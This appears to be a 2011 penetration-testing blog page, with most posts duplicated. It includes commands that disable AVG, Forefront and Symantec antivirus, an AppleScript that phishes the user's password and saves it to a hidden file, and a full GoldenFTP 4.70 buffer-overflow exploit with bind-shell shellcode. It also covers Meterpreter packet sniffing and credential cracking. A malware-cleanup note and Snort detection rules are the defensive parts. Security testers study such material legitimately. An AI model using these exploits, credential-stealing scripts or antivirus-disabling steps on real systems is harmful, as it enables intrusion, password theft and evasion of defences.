When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system. The A/V guys will also pick up on common service executable files such as being used with Metasploit’s bypassuac. Let’s face it, we still need to write stuff into temp directories from time to time.
Mark Baggett, and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies (http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows). Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using ‘wmic’ exists, then we would likely want to follow this sequence of tasks during a test:
a) Disable the A/V product of choice.
b) Upload our favorite/useful executable content. (perhaps a reverse TCP meterpreter shell or similar)
c) Upload Mark and Tim’s excellent vssown.vbs script
a. Enable service and create volume shadow copy.
b. Disable volume shadow copy service.
d) Delete our favorite/useful executable content and modified timestamps accordingly assuming we want to be somewhat stealthy.
e) Execute our content from the volume shadow copy using ‘wmic’ using the excellent vssown script, or just through ‘wmic process call create’.
The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective. Otherwise said, Windows security center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes.
1. Grisoft’s AVG
Using the 2012 Freeware version, I note the following information about AVG. Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.
DISABLING:
a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.
C:\> cd %systemroot%\program files\avg\avg2012
C:\> move avgcsrva.exe avgcsrva_.exe
C:\> move avgemca.exe avgemca_.exe
C:\> move avgnsa.exe avgnsa_.exe
C:\> move avgrsa.exe avgrsa_.exe
b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command.
C:\> wmic process where “name like ‘avg[cenr]%.exe’” delete
c. The watchdog service will to restart all of the binaries but fail.
ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.
2. Microsoft Forefront
The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.
DISABLING: kill the GUI tool and stop the A/V engine service.
C:\> wmic process where name=”msseces.exe” delete
C:\> sc stop msmpsvc
ENABLING: start the A/V service engine, and start the GUI process.
C:\> cd \Program Files\Microsoft Security Client
C:\> sc start msmpsvc
C:\> msseces.exe
3. Symantec Endpoint Protection
The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smb.exe, and smcgui.exe.
DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact.
C:\> wmic process where “name like ‘%smc%.exe’” delete
C:\> sc stop smcservice
C:\> sc stop “Symantec AntiVirus”
ENABLING: restarting just the smcservice will start everything else back up again.
C:\> sc start smcservice
This blog contains information security, penetration testing, and network architecture materials.
Monday, December 5, 2011
Tuesday, October 25, 2011
Fun with AppleScript
--
-- Description: This script prompts the user to enter their password
-- in order to perform a privileged function. The password
-- is subsequently saved to a hidden file in their home directory.
-- The "Cancel" button is the default on the dialog which
-- will hopefully encourage the user to enter accurate info.
--
-- Author: Joff Thyer, October 2011
--
set filename to ((path to home folder) as string) & ".mpass"
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "Cancel" with icon path to resource "LockedIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if ans = "OK" then exit repeat
end try
end repeat
try
set now to do shell script "date '+%Y%m%d_%H%M%S:'"
set myfile to open for access filename with write permission
set outstr to now & mypass & "
"
write outstr to myfile starting at eof
close access myfile
on error
try
close access myfile
end try
end try
-- Description: This script prompts the user to enter their password
-- in order to perform a privileged function. The password
-- is subsequently saved to a hidden file in their home directory.
-- The "Cancel" button is the default on the dialog which
-- will hopefully encourage the user to enter accurate info.
--
-- Author: Joff Thyer, October 2011
--
set filename to ((path to home folder) as string) & ".mpass"
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "Cancel" with icon path to resource "LockedIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if ans = "OK" then exit repeat
end try
end repeat
try
set now to do shell script "date '+%Y%m%d_%H%M%S:'"
set myfile to open for access filename with write permission
set outstr to now & mypass & "
"
write outstr to myfile starting at eof
close access myfile
on error
try
close access myfile
end try
end try
Friday, July 15, 2011
Using metasploit meterpreter scripts enum_firefox.rb and enum_chrome.rb
Two useful meterpreter scripts for enumerating client browser data are enum_firefox.rb and enum_chrome.rb located in the framework scripts/meterpreter directory.
It is important to understand that both of these scripts require sqlite3 be properly installed on your exploitation system. Assuming your exploitation system is Ubuntu Linux for a moment, you can ensure that sqlite3 dependencies are installed as follows:
sudo apt-get install sqlite3
sudo apt-get install libsqlite3-dev
sudo gem install sqlite3-ruby
Once this has completed, then restart your msfconsole, exploit away and run the appropriate browser enumeration scripts. Output from your enumeration will be stored in the msf config directory with the following path.
log/scripts/enum_firefox
log/scripts/enum_chrome
With a local installation under Ubuntu, the msf config directory is often $HOME/.msf
It is important to understand that both of these scripts require sqlite3 be properly installed on your exploitation system. Assuming your exploitation system is Ubuntu Linux for a moment, you can ensure that sqlite3 dependencies are installed as follows:
sudo apt-get install sqlite3
sudo apt-get install libsqlite3-dev
sudo gem install sqlite3-ruby
Once this has completed, then restart your msfconsole, exploit away and run the appropriate browser enumeration scripts. Output from your enumeration will be stored in the msf config directory with the following path.
log/scripts/enum_firefox
log/scripts/enum_chrome
With a local installation under Ubuntu, the msf config directory is often $HOME/.msf
Friday, July 8, 2011
Revised V2.5 Golden FTP 4.70 PASS overflow exploit
#!/usr/bin/python
#
###########################################################################
## Exploit Title: Revised V2.5: GoldenFTP 4.70 PASS overflow exploit
## Exploit Version: 2.5, 2011-07-08 15:00
## Date: July 8, 2011 (20110708-1500)
## Author: Joff Thyer (jsthyer@gmail.com)
## Software Link: http://www.goldenftpserver.com/
## Version: 4.70
## Tested on: WinXP-SP0/SP2/SP3
## CVE: 2006-6576
##
## based on exploit by:
## Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
##
## NOTES:
## (1) You must make sure that the "Show new connections" option is enabled
## in order for this exploit to work.
## (2) Specifying the IP source address is important as it is used in the
## calculation of the overflow buffer offset.
###########################################################################
#
import socket
import sys
from subprocess import Popen, PIPE
import re
import time
# Metasploit
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3
# 281 bytes
calc = \
"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\
"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\
"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\
"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\
"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\
"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\
"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\
"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\
"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\
"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\
"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\
"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\
"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\
"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\
"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\
"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\
"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\
"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\
"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\
"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\
"\x88"
# Metasploit
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3
# 422 bytes
cmdshell = \
"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\
"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\
"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\
"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\
"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\
"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\
"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\
"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\
"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\
"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\
"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\
"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\
"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\
"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\
"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\
"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\
"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\
"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\
"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\
"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\
"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\
"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\
"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\
"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\
"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\
"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\
"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\
"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\
"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\
"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\
"\x8c\xc7"
if len(sys.argv) < 5:
print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]
print "\tshellcode = (calc|shell)"
print "\tplatform = (sp0|sp2|sp3)"
print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"
sys.exit(0)
srcaddr = sys.argv[1]
target = sys.argv[2]
shellcode = sys.argv[3]
platform = sys.argv[4]
# which payload?
buf = calc
if shellcode == "calc":
buf = calc
elif shellcode == "shell":
buf = cmdshell
# address of JMP ESI in Kernel32.dll
if platform == "sp0":
jmpesi = "\x7b\x15\xe8\x77"
elif platform == "sp2":
jmpesi = "\xc3\x72\x85\x7c"
elif platform == "sp3":
jmpesi = "\x0b\xda\x82\x7c"
shortjmp = "\x90\x90\x90\x90\xeb\x20\n"
nopsled = "\x90" * 60
padding = "A" * (533 - len(srcaddr + buf + nopsled))
payload = nopsled + buf + padding + jmpesi
print "\
[+] Golden FTP PASS Exploit\n\
[+] Version 2.5, July 8 2011\n\
[+] Author: Joff Thyer (jsthyer@gmail.com)\n\
[+] 'Show new connections' must be enabled in GoldenFTP in order\n\
[+] for this exploit to succeed!\n\
[+] Connecting: "+target
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,21))
except:
print "[-] Connection to "+target+" failed!"
sys.exit(0)
print "[+] Sending payload, length = " + `len(payload)`
s.send(shortjmp);
s.send("USER anonymous\n")
s.send("PASS " + payload + "\n")
s.recv(1024)
print "[+] Sleeping 2 secs..."
time.sleep(2)
s.close()
if shellcode == "shell" and srcaddr == target:
p = Popen(["netstat","-na"],stdout=PIPE,shell=False)
netstat = p.stdout.read()
shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)
if shellok:
print "[+] "+shellok.group(0)
print "[+] Done."
sys.exit(0)
Thursday, June 2, 2011
Using CAIN to read packet captures during a Penetration Test
There are many ways to leverage transitive trust relationships in an environment when performing Penetration Testing. Once privileged level access is obtained on a single Windows system, hashes can usually be obtained, and it is often the case that shared credentials exist. In the case of a LANMAN or NT hash environment which only uses LANMAN/NTLMv1 challenge/response and fixed stored hashes, it is known that access to other Windows systems can be trivially obtained through only stored hash possession.
Within the Metasploit framework, exists the 'windows/smb/psexec' module which works in a similar fashion to the Microsoft sysinternals PSEXEC command, but can also utilize "pass the hash" by setting the SMBPass variable to a LANMAN:NT hash rather than a plaintext password. This can be a useful way to pivot through to other systems once a single set of hashes is obtained.
A feature of the Metasploit Meterpreter I found useful in a recent Penetration Test is the 'sniffer' module. This module will allow you to capture up to 50,000 packets from an exploited system and download the captured data to a libpcap compatible file.
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
packets: 1849
bytes: 444042
meterpreter > sniffer_dump 2 myfile.pcap
meterpreter > sniffer_stop 2
During a recent Pen Test, I happened to gain access to a network monitoring system. This is the near perfect scenario to leverage the meterpreter sniffer module.
CAIN (www.oxid.it) is most often thought about as a layer 2 network interception and man in the middle tool with an incredibly useful set of password hash analysis and cracking ability. CAIN has the to perform cryptanalysis using traditional rcrack style rainbow tables, as well as the ophcrack format rainbow tables. Password cracking can also be done using dictionary or brute force mode.
What is usually overlooked is that CAIN can read libpcap files and process the contents, parsing out all of the useful various application and O/S password hash formats. To perform this libpcap file parsing in CAIN is a simple click on the open folder looking icon in the top left of the menu bar. It is hard to find because the typical "open file" entry does not exist in the file menu.
I used this capability to parse through sniffer packet captures from compromised systems, and managed to further my intrusion into the environment significantly in the process. Cryptanalysis, dictionary and bruteforce attacks can be leveraged against captured LANMAN/NT challenge response transactions. Dictionary and bruteforce attacks can be used against Oracle, and MySQL database credentials which are often weak. SNMP version 1 community strings are obviously plaintext and easy to capture. MSSQL in older days uses TDS (Unicode XOR with 0xa5) which is easily reversible. It is also quite interesting to see how much plaintext LDAP can be leveraged for access also.
Within the Pen Testing context, obtaining access and obtaining passwords with associated cracking time is a huge component. However, we cannot forget that demonstrating access to real data is important to show there exists real risk.
I find that the most interesting demonstration of this is to show that you can access database tables. However, one must tread carefully in this area. When demonstrating this access, try showing some table names, some column names and such without actually pulling database rows themselves. The idea is to prove you own it, and you're there without putting sensitive data into your reports. Redacted screenshots can work well in this context also.
With regard to database client software, the most challenging area is to get a functional Oracle PL*SQL client working. The installation is a little tricky but if you have access to a handy and friendly DBA, you can be up and running pretty quickly.
Microsoft SQL servers often have the command line utility named OSQL.EXE actually on the server itself, and PWDUMPX is useful for pulling LSA secrets from the Windows registry which often contain database credentials.
MySQL command line client is a simple installation, especially with Linux distro's like Ubuntu so that should not present much challenge.
Within the Metasploit framework, exists the 'windows/smb/psexec' module which works in a similar fashion to the Microsoft sysinternals PSEXEC command, but can also utilize "pass the hash" by setting the SMBPass variable to a LANMAN:NT hash rather than a plaintext password. This can be a useful way to pivot through to other systems once a single set of hashes is obtained.
A feature of the Metasploit Meterpreter I found useful in a recent Penetration Test is the 'sniffer' module. This module will allow you to capture up to 50,000 packets from an exploited system and download the captured data to a libpcap compatible file.
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
packets: 1849
bytes: 444042
meterpreter > sniffer_dump 2 myfile.pcap
meterpreter > sniffer_stop 2
During a recent Pen Test, I happened to gain access to a network monitoring system. This is the near perfect scenario to leverage the meterpreter sniffer module.
CAIN (www.oxid.it) is most often thought about as a layer 2 network interception and man in the middle tool with an incredibly useful set of password hash analysis and cracking ability. CAIN has the to perform cryptanalysis using traditional rcrack style rainbow tables, as well as the ophcrack format rainbow tables. Password cracking can also be done using dictionary or brute force mode.
What is usually overlooked is that CAIN can read libpcap files and process the contents, parsing out all of the useful various application and O/S password hash formats. To perform this libpcap file parsing in CAIN is a simple click on the open folder looking icon in the top left of the menu bar. It is hard to find because the typical "open file" entry does not exist in the file menu.
I used this capability to parse through sniffer packet captures from compromised systems, and managed to further my intrusion into the environment significantly in the process. Cryptanalysis, dictionary and bruteforce attacks can be leveraged against captured LANMAN/NT challenge response transactions. Dictionary and bruteforce attacks can be used against Oracle, and MySQL database credentials which are often weak. SNMP version 1 community strings are obviously plaintext and easy to capture. MSSQL in older days uses TDS (Unicode XOR with 0xa5) which is easily reversible. It is also quite interesting to see how much plaintext LDAP can be leveraged for access also.
Within the Pen Testing context, obtaining access and obtaining passwords with associated cracking time is a huge component. However, we cannot forget that demonstrating access to real data is important to show there exists real risk.
I find that the most interesting demonstration of this is to show that you can access database tables. However, one must tread carefully in this area. When demonstrating this access, try showing some table names, some column names and such without actually pulling database rows themselves. The idea is to prove you own it, and you're there without putting sensitive data into your reports. Redacted screenshots can work well in this context also.
With regard to database client software, the most challenging area is to get a functional Oracle PL*SQL client working. The installation is a little tricky but if you have access to a handy and friendly DBA, you can be up and running pretty quickly.
Microsoft SQL servers often have the command line utility named OSQL.EXE actually on the server itself, and PWDUMPX is useful for pulling LSA secrets from the Windows registry which often contain database credentials.
MySQL command line client is a simple installation, especially with Linux distro's like Ubuntu so that should not present much challenge.
Monday, April 11, 2011
Windows XP Startup/Logon Process and Malware
Recently I had to rescue my daughter's PC from some nasty malware. For many security professionals, troubleshooting family systems is a common weekend / after hours challenge, and a lot of us are not in the business of desktop remediation.
I find that the ISO based whole system virus scanners are not a bad starting point to get rid of the low hanging fruit. I have used F-Secure, and Kaspersky among others.
I also find that after the scanning/remediation process, XP registry entries are often still broken leading a lot of people to the point of just re-installing. Of course, re-installing is sometimes the only option for deeply embedded malware and/or rootkit.
A tool I found useful when I was poking through the HKEY_USER registry hive was 'USER2SID' since those registry entries are keyed by the SID. I also found that the malware I was dealing with had re-written the 'exefile' and '.exe' startup shell keys to be its own EXE file which was somewhat frustrating when that malware exe file was finally missing. (ie: Windows kept asking what program to open an exe with!!)
Also, age old advice is to remember those program startup registry keys which are often used to infect/re-infect things:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
%systemdrive%\Documents and Settings\username\Start Menu\Programs\Startup
%windir%\Profiles\All Users\Start Menu\Programs\Startup
%windir%\Profiles\username\Start Menu\Programs\Startup
Don't forget about our old SysInternals tools, particularly 'AutoRuns' and 'Process Explorer' which I continue to find extremely useful.
The Windows utility SFC.EXE is useful for a diff scan of critical system files as long as it has not been compromised.
*** Always use READ-ONLY media when in a desktop incident response situation like this otherwise anything goes with regard to what is written to your favorite USB memory stick!
I find that the ISO based whole system virus scanners are not a bad starting point to get rid of the low hanging fruit. I have used F-Secure, and Kaspersky among others.
I also find that after the scanning/remediation process, XP registry entries are often still broken leading a lot of people to the point of just re-installing. Of course, re-installing is sometimes the only option for deeply embedded malware and/or rootkit.
A tool I found useful when I was poking through the HKEY_USER registry hive was 'USER2SID' since those registry entries are keyed by the SID. I also found that the malware I was dealing with had re-written the 'exefile' and '.exe' startup shell keys to be its own EXE file which was somewhat frustrating when that malware exe file was finally missing. (ie: Windows kept asking what program to open an exe with!!)
Also, age old advice is to remember those program startup registry keys which are often used to infect/re-infect things:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
%systemdrive%\Documents and Settings\username\Start Menu\Programs\Startup
%windir%\Profiles\All Users\Start Menu\Programs\Startup
%windir%\Profiles\username\Start Menu\Programs\Startup
Don't forget about our old SysInternals tools, particularly 'AutoRuns' and 'Process Explorer' which I continue to find extremely useful.
The Windows utility SFC.EXE is useful for a diff scan of critical system files as long as it has not been compromised.
*** Always use READ-ONLY media when in a desktop incident response situation like this otherwise anything goes with regard to what is written to your favorite USB memory stick!
Detecting PECOFF EXE/DLL files with Snort
Some time ago, I became interested in parsing the PECOFF file format. As a result, I authored several different Snort rules to detect the transfer of either an EXE or DLL file of different varieties. Listed below are rules for both i386/32-bit and x86-64-bit. Additionally, there is a set of rules for UPX Packed EXE files.
Hopefully readers and Snort fans will find these useful.
# i386 32-bit EXE over TCP
log tcp any any -> any any (msg:"LOCAL: i386 PE32 EXE File Xfer"; flowbits:isnotset,upx.exe.packed; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; flowbits:unset,upx.exe.packed; sid:4963001; rev:1;)
# i386 32-bit DLL over TCP
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963002; rev:1;)
# x86 64-bit EXE over TCP
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 68|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963101; rev:1;)
# x86 64-bit DLL over TCP
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 68|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963102; rev:1;)
# UPX Packed EXE over TCP
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over TCP"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963201; rev:1;)
# UPX Packed EXE over UDP
alert udp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over UDP"; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963301; rev:1;)
Hopefully readers and Snort fans will find these useful.
# i386 32-bit EXE over TCP
log tcp any any -> any any (msg:"LOCAL: i386 PE32 EXE File Xfer"; flowbits:isnotset,upx.exe.packed; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; flowbits:unset,upx.exe.packed; sid:4963001; rev:1;)
# i386 32-bit DLL over TCP
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963002; rev:1;)
# x86 64-bit EXE over TCP
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 68|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963101; rev:1;)
# x86 64-bit DLL over TCP
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 68|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963102; rev:1;)
# UPX Packed EXE over TCP
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over TCP"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963201; rev:1;)
# UPX Packed EXE over UDP
alert udp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over UDP"; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963301; rev:1;)
Subscribe to:
Posts (Atom)